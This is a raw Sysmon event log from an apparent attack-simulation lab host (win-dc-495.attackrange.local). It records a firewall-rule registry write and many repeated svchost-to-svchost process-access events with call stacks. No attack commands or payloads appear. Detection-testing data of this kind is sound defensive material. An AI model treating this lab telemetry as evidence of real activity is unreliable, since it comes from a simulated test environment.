13:58:22.086{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{B6DFE438-1E44-40B4-AC11-102F9C279AFE}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}| 10341000x800000000000000010752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 